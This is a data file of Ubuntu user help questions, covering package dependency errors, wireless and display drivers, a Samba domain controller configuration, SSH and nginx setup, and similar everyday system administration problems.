408638	how can i install libgl1-mesa-glx	i am trying to install opencpn , a navigation and chart program . the install guide recommend this : it is also possible to install the package via dpkg or rpm , on the condition that all dependencies are met.to make sure that this is the case on ubuntu , open a terminal window to get a command line , ( applications- > accessories- > terminal ) and copy and paste the following line : sudo apt-get install libwxgtk2.8-0 libwxbase2.8-0 wx-common libglu1-mesa libgl1-mesa-glx zlib1g bzip2 gpsd gpsd-clients xcalib libportaudio2 . then proceed with the commands below . i typed : sudo apt-get install libwxgtk2.8-0 libwxbase2.8-0 wx-common libglu1-mesa libgl1-mesa-glx zlib1g bzip2 gpsd gpsd-clients xcalib libportaudio2 in the terminal and got this : reading package lists ... done building dependency tree reading state information ... done bzip2 is already the newest version . libportaudio2 is already the newest version . libportaudio2 set to manually installed . zlib1g is already the newest version . xcalib is already the newest version . libglu1-mesa is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : libgl1-mesa-glx : depends : libglapi-mesa ( = 8.0.4-0ubuntu0.7 ) recommends : libgl1-mesa-dri ( > = 7.2 ) e : unable to correct problems , you have held broken packages . what should i do now to fix the problem with libgl1-mesa-glx ?
408640	tool to ask adressbook for pgp keys	i would like to know if somebody knows a tool , where i can query my whole adress book in thunderbird or gmail , to ask , if there are pgp keys for somebody there . so i can just use the pgp key of people there . or can i do this with gnupg ?
408644	how to install up-to-date virus scanner clamav in 12.04 ?	clamav is in the official security software repositories from canonical , but on running freshclam , it reports : clamav update process started at tue jan 21 10:31:59 2014 warning : your clamav installation is outdated ! warning : local version : 0.97.8 recommended version : 0.98.1 ( i have backports repo enabled , too . ) i would assume that there 's little point with a virus scanner that is not up to date . i can think of two answers , i 'm hoping the second is correct : canonical do n't take security seriously in this regard , you 'll have to go outside the software centre to download something from elsewhere . i ca n't accept this from the most secure popular os available edit : i feel me stating my opinion on canonical 's policy in the question has skewed the tone of answers . all answers say ( 2 ) but in fact answer ( 1 ) : you have to fetch in code from outside ubuntu lts , probably because those people can accept this as fine . you clearly have n't done x . type this or click that , and you 'll get proper security updates for ubuntu lts from official sources . please advise ! thanks .
408645	ubuntu 12.04 dell inspiron 1440 wireless network does not work with wireless networkdisconnected messages	i installed ubuntu 12.04 lts on my laptop dell inspiron 1440 . wired connection works fine . but wireless connection does not work . i installed the driver . i can see my home wireless net work and configured with password . but after configuring it , it keep saying wireless network disconnected . i removed wired connection and internet does not work with wireless even though i see my network . this is what i did after going through previous questions . lspci -nn to check what driver i need . the output is ; broacom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ( rev 01 ) as per recommendation i did this ; sudo apt-get install linux-headers-generic sudo apt-get install -- reinstall bcmwl-kernel-source sudo modprobe wl assuming the wireless switch is on , your wireless should now be working ; check : rfkill list all but i still get this message `` wireless network disconnected '' and wireless connection does not work . i ran software updates to make sure i am current before doing the above . i spent lot of time on this . any help is greatly appreciated .
408646	ubuntu - saying your security settings have blocked an application from running with an out-of-date version of java	i have this new problem since 2014 begin . i cant remotely login to this enterprise network for giving them support . its keep showing this new error . how to fix it please ? edit :
408647	problems after cancelled upgrade on lts 12.04	while playing around with my distribution 12.04 lts , i was checking to see how the upgrade procedure goes and used the command sudo do-release-upgrade and it said no new release found . all good , then i typed sudo do-release-upgrade -d and cool , it worked . but that was just trying things out . now each time i am starting my update manager , it shows me a bunch of partial updates and if i click on install them , it goes straight to distribution upgrade . i am more than happy with my lts and want to fix this upgrade popping up issue each time i am trying to update my system software . any help in this direction is highly appreciated .
408650	not able to add windows machine in samba pdc	i have configured samba pdc and i have some windows machine which i want to add in that pdc . i have created a user and set smbpasswd for that user but when i try to connect windows machine and it asks for user name and password it does n't accept it and it says access is denied . my samba configuration is as follows : - # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = server netbios name = server # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server wins support = yes # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses name resolve order = wins lmhosts host bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . ; encrypt passwords = yes # if you are using encrypted passwords , samba will need to know what # password database type you are using . ; passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # domain logons = yes domain master = yes local master = yes preferred master = yes os level = 64 # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) logon drive = h : logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes ; guest ok = no ; guest account = nobody # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username [ homes ] comment = home directories browseable = no writable = yes # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) [ netlogon ] comment = network logon service path = /home/samba/netlogon guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on [ profiles ] comment = users profiles path = /home/samba/profiles ; guest ok = no browseable = no create mask = 0600 directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ new scan ] path = /mnt/scan/new scan browseable = yes read only = no [ share ] path = /mnt/sda2/share browseable = yes read only = no [ format ] path = /mnt/sda2/format browseable = yes read only = no [ books ] path = /mnt/sda2/books browseable = yes read only = no
408651	communicating via ssh outside local network,	i have a server loaded with ubuntu 12.04 lts . i have been using ssh within my network to use the server . now i want to communicate via ssh to the server so i can access the server while i 'm in class or bored while away from home . i have ssh configured to listen to 1234 port ( example , not really ) , not 22 . i then have the router port forwarding port 1234 to the ip address of the server . what am i doing wrong ?
408653	ram speeds with dmidecode command	i wanted to see my ram capabilities so i runned dmidecode . the output : memory device array handle : 0x0028 error information handle : 0x002b total width : 64 bits data width : 64 bits size : 4096 mb form factor : sodimm set : none locator : dimm0 bank locator : bank 0 type : ddr3 type detail : synchronous speed : 800 mhz manufacturer : unknown serial number : 27381104 asset tag : unknown part number : sharetronic rank : 2 configured clock speed : 1600 mhz question : are my rams running on 800mhz speed ( speed : 800 mhz ) ? and they can run on 1600mhz ( configured clock speed : 1600 mhz ) ?
408654	slow usb speed in ubuntu 13.10	i have running dual boot of windows 7 and ubuntu 13.04 in lenovo g580 . my laptop configured usb 3.0 . in windows7 usb speed is high ( 30-40 mb/sec ) , but in ubuntu 13.04 its very very less ( 1-2 mb/sec ) . how can i improve this speed in ubuntu . here i 'm attaching out put file of lsusb and dmesg|tail ramesh @ ramesh-lenovo-g580 : ~ $ lsusb bus 002 device 003 : id 04f2 : b2e2 chicony electronics co. , ltd bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 005 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 2188:0ae1 bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ramesh @ ramesh-lenovo-g580 : ~ $ dmesg|tail [ 3271.475376 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 3271.475380 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 3286.988521 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 3288.196715 ] wlan0 : authenticate with 58:93:96:1f:13:18 [ 3288.218574 ] wlan0 : send auth to 58:93:96:1f:13:18 ( try 1/3 ) [ 3288.220503 ] wlan0 : authenticated [ 3288.223646 ] wlan0 : associate with 58:93:96:1f:13:18 ( try 1/3 ) [ 3288.228688 ] wlan0 : rx assocresp from 58:93:96:1f:13:18 ( capab=0x21 status=0 aid=8 ) [ 3288.228718 ] wlan0 : associated [ 3288.228726 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready
408655	urdu phonetic 1.0 in ubuntu	i use to work a lot with urdu language in my office . i got some homework and i tried to type some urdu in libreoffice but the keyboard layout is completely changed . i ca n't find many of the symbols on keyboard and there are some urdu words on wrong buttons . i want this keyboard layout in ubuntu can i get this ? ? http : //urdu.ca/phonetic-keyboard-layout1.gif
408663	compaq nx9105 - which ubuntu release ?	i 'm trying to refurbish and old nx9105 laptop , and newer versions of ubuntu do n't load to live session . how would i found out which ubuntu release would work on the laptop without trying all ? thanks , d .
408667	grub gone . usb boot and windows recovery both do n't work	i have an asus zenbook ux31e 128 gb ssd without cd reader . time ago i installed ubuntu in parallel with windows7 dividing in half the ssd space and leaving the 2 small partitions of which one should be the recovery of windows . yesterday i wanted to access the ubuntu partition using window to store file , so i used the ubuntu disk management utility to try change ubuntu partition to ntfs . i should not have done it at all . now at startup instead of the usual grub with purple background ( should be the grub 2 , is n't it ? ) grub rescue comes and gives me `` error : no such partition '' . i think the ubuntu partition is no longer recognizable ( but i think it 's still there , i just tried to change format and i have not seen progress bars with ongoing processes ) and the grub can not see his configuration file that is among the system files of ubuntu . i created a ubuntu usb stick with unetbootin to use grub -repair from there , so i choose as boot device uefi : '' key name `` ( there was also the option without uefi but does n't work ) . booting from usb seems to work , it opens `` gnu grub version 1.99 - 21ubuntu3 .10 `` with the options `` try ubuntu without installing `` , `` install ubuntu '' and `` check for disk defects `` but none of the three works , and bring all to a black screen with no chance to do something . in addition to the three options mentioned i can go to `` edit the commands before booting '' or command- line , from these two can i do something ? or do you advise me to try to re-download the iso of ubuntu and redo the key ? at his point i decided to format the pc and factory restore it . when you switch on the pc with f9 pressed you should activate the windows recovery that allows to restore your computer running like new , but it does n't work , i 'm sure i 've not deleted the partition . i think the windows recovery does n't work because the grub problem is before the ricovery . i should choose windows from grub and then press f9 . finally , to the ls command typed in the command line grub made ââfrom the stick i have : ( memdisk ) ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) ( hd1 ) ( hd1 , msdos1 ) ( hd2 ) ( hd2 , msdos3 ) ( hd2 , msdos2 ) ( hd2 , msdos1 ) . i thank anyone who has the patience to read . any help will be greatly appreciated , thanks . francesco .
408669	packages that are architecture independent wo n't install	i 'm using the 64-bit install , but whenever i install something i386 and have a dependency which is architecture in dependent any it fails to install through the normal apt-get method . please correct me if i 'm wrong .for example , run apt-get install unity : i386 as root and see the dependency errors which is mostly about those any packages being uninstallable . why is that so ? is there any way around this ?
408670	unable to login in ubuntu one application	ubuntu one application shows `` user authentication failed '' error while logging in . while i can easily login on net . i already checked my registration is complete .
408676	accessing mysql using terminal in ubuntu 13.04	accessing phpmyadmin db from terminal now in ubuntu 13.04 i firstly installed mysql server with sudo apt-get install mysql-server mysql server version 5.5 now in terminal i can check if it is working by sudo netstat -tap | grep mysql it responds me by prompting me for password and then tcp 0 0 localhost : mysql * : * listen 26214/mysqld but to connect using my root account i typed mysql -u root -p prompting for password it shows error 1045 ( 28000 ) : access denied for user 'username ' @ 'localhost ' ( using password : yes ) when i try this /opt/lampp/bin/mysql -u root -p it ask for password and says error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/opt/lampp/var/mysql/mysql.sock ' ( 2 ) what is there in /etc/mysql/my.cnf and what is in /opt/lampp/bin/mysql any solution ?
408680	`` untitled window '' icons when using android studio	while using android studio on 12.04.3 , i keep getting a lot of untitled window icons in the left bar : i ca n't click or close them ( the only options are `` keep in launcher '' or `` close '' , which does nothing ) . is there any way i can fix this ? edit some additional info : this also happens in 13.10 , but those icons appear and dissapear almost instantly . it seems to be caused by the tooltips that appear in the ide ( ex : method signature ) . this happens while using the launcher created by android studio or launching directly in the terminal .
408681	i want to install origin	i am a complete and utter noob at using ubuntu and linux in general ( i literally just put it on my second harddrive yesterday ) . i would like to get originea onto my computer so that i can play games . i already have steam because there was an app in the software center . but ea does n't have a compatible version . i already have wine , and when i downloaded the installation file , i right clicked it and hit run with wine . i had already installed it wrong so i reinstalled it . now when i click on origin both on the taskbar and desktop , nothing . it flashes like it wants to load . i need to know everything i have to do to fix this ! ( also any info that would help me in the future with installing incompatible software would be great ! )
408685	which ppa to purge in resolving this 404 error in apt-get udpate ?	$ sudo apt-get update is breaking and giving the following error : http : //ppa.launchpad.net/joh/ppa/ubuntu/dists/saucy/main/binary-amd64/packages i 've tried looking at /etc/apt/sources.list but i ca n't find any ... /joh/ppa/ ... to uncomment . my sources.list is pasted here : http : //pastebin.com/uuzdhzcg which package do i uncomment/purge to resolve the 404 error ? how do i skip this package and continue the update ?
408686	file permissions for openvpn setup	i ca n't find what permissions i should give to certificates and to the folder . i am importing the files from kde network manager . if i give 400 or 640 permissions to /etc/openvpn , then , from the network manager i ca n't open the folder openvpn in order to import the necessary files .
408696	ignoring specific unmet dependencies with aptitude ?	this is my situation : i 've installed a program called ipe `` forcably '' through a deb package ; the reason for this is that ipe depends on texlive-latex-base , however , i already maintain a separate install of latex via tlmgr . there is no problem with that kind of install of ipe , however , as long as i remember to run it from a terminal , which suits me fine . the problem is that that broken dependency now does n't allow me to install packages which are completely unrelated - in this case , dropbox : $ sudo apt-get install dropbox reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ipe : depends : texlive-latex-base but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . now , if i try -f install , that will try to fix the ipe install , which is what i do not want . it turns out , aptitude looks like it could offer a way to ignore/skip over this dependency : $ sudo aptitude install dropbox the following new packages will be installed : dropbox the following partially installed packages will be configured : ipe { b } 0 packages upgraded , 1 newly installed , 0 to remove and 1 not upgraded . need to get 93,0 kb of archives . after unpacking 410 kb will be used . the following packages have unmet dependencies : ipe : depends : texlive-latex-base but it is not going to be installed . the following actions will resolve these dependencies : remove the following packages : 1 ) ipe accept this solution ? [ y/n/q/ ? ] 1 action `` 1 '' : removing ipe package : ipe state : unpacked automatically installed : no version : 7.0.10-2 priority : optional ... this action was selected because ipe depends upon texlive-latex-base . enter `` r 1 '' to prevent this action from appearing in new solutions . enter `` a 1 '' to require that new solutions include this action if possible . accept this solution ? [ y/n/q/ ? ] r 1 rejecting the removal of ipe the following actions will resolve these dependencies : remove the following packages : 1 ) r ipe accept this solution ? [ y/n/q/ ? ] y the following new packages will be installed : dropbox the following packages will be removed : ipe { a } 0 packages upgraded , 1 newly installed , 1 to remove and 1 not upgraded . need to get 93,0 kb of archives . after unpacking 5.034 kb will be freed . do you want to continue ? [ y/n/ ? ] n abort . the weird thing is : even if i specify r 1 - and the program actually confirms that with `` rejecting the removal of ipe '' - i still get `` the following packages will be removed '' in the end , which is i what i specifically do not want to do ? ( btw , i 've also tried a 1 , and the end results are completely the same , `` ... will be removed '' , although that is the action i 'd expect for that choice ) . where am i going wrong ? am i misunderstanding what they mean by `` new solutions '' ? and is there a way to have the apt/aptitude system know , that i 'd rather it ignores the unmet dependencies of ( in this case ) ipe ?
408699	dual monitors resolution reset on each restart	environment : os : xubuntu 13.04 linux kernel : 3.8.0-35 nvidia driver version : 313.30 gpu name : geforce gt 630 monitors : dell u2312hm . connected to dvi port of video card ( without any adapter ) . lg w1943ss . connected to vga port of video card ( without any adapter ) . after each pc reboot the settings resets to the following ( screenshot of dell display ) : lg display overlaps the dell display , but before reboot there was the following configuration : i tried to save x configuration to file but nothing changed , the same situation after reboot ... i tried to change vga and dvi cables but it does n't help . i have generated nvidia bug report file that contains at least xorg.log and xorg.conf : https : //gist.github.com/anonymous/0a0e5a8a5815d7a64d92 please , help .
408702	wireless nic unrecognized after using aireplay	i am using virtual box . i am on an alienware ranger wireless nic is alfa awus036h when i specifically use aireplay-ng deauthentication , the deauth signal will work then i get the usb just got unplugged sound . this is done on my home network btw .
408708	how can i determine about a command , that which package provides it , using the command line ?	let 's say , i have a command for which i want to know the source code . for example : unity-webapps-runner . i know which unity-webapps-runner tells me where to find , but how to find out with apt-cache that which package installed the binary , so i can run apt-get source < pkg-name > ?
408709	login page for users trying to access my hotspot	i want to show a login page for users who try to access my hotspot . and then once they login i want to capture their mac address . its like a small captive portal for my laptop . any advice ? ?
408710	yad list columns	i need some help with yad . this is my code : contact= $ ( while read line do firstname= $ ( echo $ line | awk 'begin { fs= '' | '' } { print $ 2 } ' ) lastname= $ ( echo $ line | awk 'begin { fs= '' | '' } { print $ 3 } ' ) num= $ ( echo $ line | awk 'begin { fs= '' | '' } { print $ 4 } ' ) birthday= $ ( echo $ line | awk 'begin { fs= '' | '' } { print $ 5 } ' ) if [ $ firstname ! = `` '' -a $ lastname ! = `` '' ] ; then echo `` $ firstname $ lastname '' else if [ $ firstname ! = `` '' ] ; then echo `` $ firstname , '' elif [ $ lastname ! = `` '' ] ; then echo `` $ lastname '' else echo `` $ num '' fi fi done < `` contactlist.txt '' ) idlist= $ ( while read line do idnum= $ ( echo $ line | awk 'begin { fs= '' | '' } { print $ 1 } ' ) echo $ idnum done < `` contactlist.txt '' ) sortcontact= $ ( printf `` % s\n '' $ contact | sort ) selected= $ ( yad -- title= '' contacts '' -- width=200 -- height=200 -- button= '' display:2 '' -- button= '' add:3 '' -- list -- separator= '' '' -- column= '' list '' $ sortcontact -- column= '' id : num '' $ idlist ) the output in $ idlist and $ sortcontact are all mixed up . i want that the column id should only have the $ idlist while the column list should only have the $ sortcontact .
408716	a better way to install ubuntu 12.04 on 500 desktops	i have to install ubuntu 12.04 lts on 500 desktops . i want to know what is the better way to achieve this task . all the machines have same hardware without network .
408720	how do i adjust screen brightness / backight on a toshiba satellite c50d ?	i know this is a known bug , it been asked and answered thousands of times before . i 've spent the past couple of months searching for a solution and all have failed . my fn keys wo n't adjust brightness and if i go to system setting > brightness and lock the brightness bar seems to appear for a split second then disappears . echo 5 > /sys/class/backlight/acpi_video0/brightness changes the value of the brightness but the brightness does not actually change . i 'm using ubuntu 12.04 lts on a toshiba satellite c50d
408722	installing antivirus	why it is not possible to possible on ubuntu to install antivirus or other software just by downloading exe file instead of using command line ? im having all the pains to install free avg 2014 on ubuntu 12.04 thanks
408724	unable to install ubuntu due to a partition error	so i tried to install ubuntu using a usb drive . everything went fine but in the last step where i had to do the partition , when i clicked `` install now ! `` , a pop-up appeared saying an error occurred . it 's ubuntu 12.04 lts desktop for intel . i 'm on a windows 7 laptop and i 'm trying to have both os 's at the same time , i already unfrag the hard drive before trying to install . btw , this laptop is crappy with 1gb ram , intel celeron 560 & a 120gb hdd . that 's it .
408727	errno 5 while installing 13.10	every time i try to install 13.10 from my usb drive i get errno 5 . i selected to wipe windows at the start so i ca n't go back and redownload or anything . not sure what to do here . any help ?
408729	unity is not able to diplay three wine windows	i am new to ubuntu , i am using navicat for mysql using wine . but when three consecutive windows open on navicat version 10.0.9 - standard ( for example - navicat , query window and new server connection window ) and i switch to some other process and return to wine to do work by clicking on unity , i only able to retrieve two windows only one got hide behind the two . the window which got hide out is the new connection window and without retrieving it i ca n't work on navicat , now i have to close navicat . loosing queries . is there a solution for this problem ?
408734	where to find openmpi-doc on my ubuntu 12.04 ?	i installed openmpi by apt-get install openmpi-doc . i think it is some folder that contain the document on openmpi ? where can i find it ? i just switched from windows to bbuntu , so a lot of things are difficult for me . thank you .
408736	alt+shift layout switching problem in 13.10	i tried to set alt+shift as the keys to switching a keyboard layout in my ubuntu 13.10 . the only problem is every time i type alt+shift when i set the keys , it is also writing `` next group '' . when i try to switch layouts , it does n't work . what is this `` next group '' key and what i did wrong ? i also tried : setxkbmap -option grp : alt_shift_toggle en , he but i got this error : error loading new keyboard description my question is what is this `` next group '' key and why is it showing when i do n't press any other key , and not how to use shift_alt to change keyboard layout .
408738	bluetooth headset not recognized in ubuntu 13.10	i am using samsung bhs3000ibecinu bluetooth headset with ubuntu 13.10 . but it 's not being recognized as an audio device . installing pavucontrol did n't work . how can i get my headset working ?
408742	ubuntu 13.10 : no ethernet + wifi on hp mini 1033cl netbook ( marvell + bcm4312 )	i took out my hp mini 1033 cl netbook from its retirement today and installed ubuntu 13.10 on it to use it during a trip abroad soon . all seems to be working fine except connecting it to the internet . the network applet shows the empty triangular icon and clicking on it shows ethernet network disconnected . no mention of wifi either . when connecting an ethernet cable to the router , nothing happens . the additional drivers window in 'software & updates ' is empty , although i expected to see at least broadcom 's sta driver . 'lspci ' command produced those 2 relevant lines : 01:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 02:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller is there a way to install necessary drivers without a connection ( through a flash drive ) ? if so , kindly guide me through the steps in a not so technical manner as i 'm still a noob . thanks . edit : as to @ chili555 's comment : dmesg | grep sky2 results in [ 2.713924 ] sky2 : driver version 1.30 [ 2.713998 ] sky2 0000:02:00.0 : enabling device ( 0000 - > 0003 ) [ 2.714180 ] sky2 0000:02:00.0 : unsupported chip type 0xff [ 2.714288 ] sky2 : probe of 0000:02:00.0 failed with error -95 [ 3.176248 ] modules linked in : i915 ( + ) ssb sky2 i2c_algo_bit drm_kms_helper wmi drm video ( f ) [ 3.195068 ] modules linked in : i915 ( + ) ssb sky2 i2c_algo_bit drm_kms_helper wmi drm video ( f )
408743	how do i set emblems in thunar without the gui ?	i would like to add emblems to a file in thunar using a script , but i ca n't find any documentation on this . is it possible to do this ? and if so , how ? the same question was asked here , but they mention a ~/.cache/thunar/metafile.tdb file which does not exist on my system . i think that question and the answer are outdated .
408744	can not adjust brightness in dell n4030 having ubuntu 12.04	recently , i installed ubuntu 12.04 lts as dual boot along with my windows 7 64bit.but i 'm unable to adjust brightness in my dell n4030 . even i 'm unable to adjust brightness using the keyboard function keys . please give me suggestions .
408746	taskwarrior ( task reminder ) applet	i am trying to find a way how to integrate taskwarrior ( aka task ) reminders into unity and i understand the clock applet in ubuntu shows tasks from evolution-data-server . is there a way to switch task/calendar sources , or an `` easy '' way to write my own applet for that purpose ?
408748	unable to add subdomains with nginx server	i have nginx running on my server and i 'm trying to set up a sub domain in the server . once i tried and it worked without any problem . this is the tutorial i followed i have subdomains such as this nz.mydomain.com now i 'm trying to setup another domain as nickies.mydomain.com i did exactly what i did initially . but nginx does n't pick up the site , though the config file shows up inside sites-enabled . you can preview the domain here this is my config file server { listen 80 ; # # listen for ipv4 ; this line is default and implied # listen [ : : ] :80 default ipv6only=on ; # # listen for ipv6 root /var/apps/nickies/public_html ; index index.html index.htm ; # make site accessible from http : //localhost/ server_name nickies.proitzen.com ; } also another peculiar thing i noticed . all other config files have color formatting in vi editor ( e.g commented lines are marked in separate color ) but even when i copy the same file to create new file the same color format is not getting applied in the file . sudo nginx -t does n't return any error message at all . everything looks fine except the domain is not working . is there any limitation on number of domains in nginx ? what am i missing here ? this is driving me nuts for last 6 hours . thanks for your time in advance .
408750	file sharing with ubuntu 12.04 server	i have setup ubuntu 12.04 server and am using it as a raid 1 backup for all my photos and files . i would like to set up a web based file server and backup like google drive so i can share my files and get to them whenever i need to . i want it to be easy to get to with no extra programs to install . like i said , just like google drive . i 've looked all over for solutions , but i do n't know where to start . any help would be appreciated . i do n't mind trying to implement it myself , i just need to know where to start looking ! thanks a lot !
408752	access computer on internal network from internet	my setup : ubuntu 13.10 server with ufw , facing outside world on eth0 , ip forwarding and masquerading working ok. internal network 192.168.0/24 on eht1 , no problem accessing the internet . i need to access ports 81 , 8000 and 554 on 192.168.0.101 coming to/from the internet ( it 's a dvr for a cctv system , which i need to monitor remotely ) . how can i achieve this ? thanks in advance for the help .
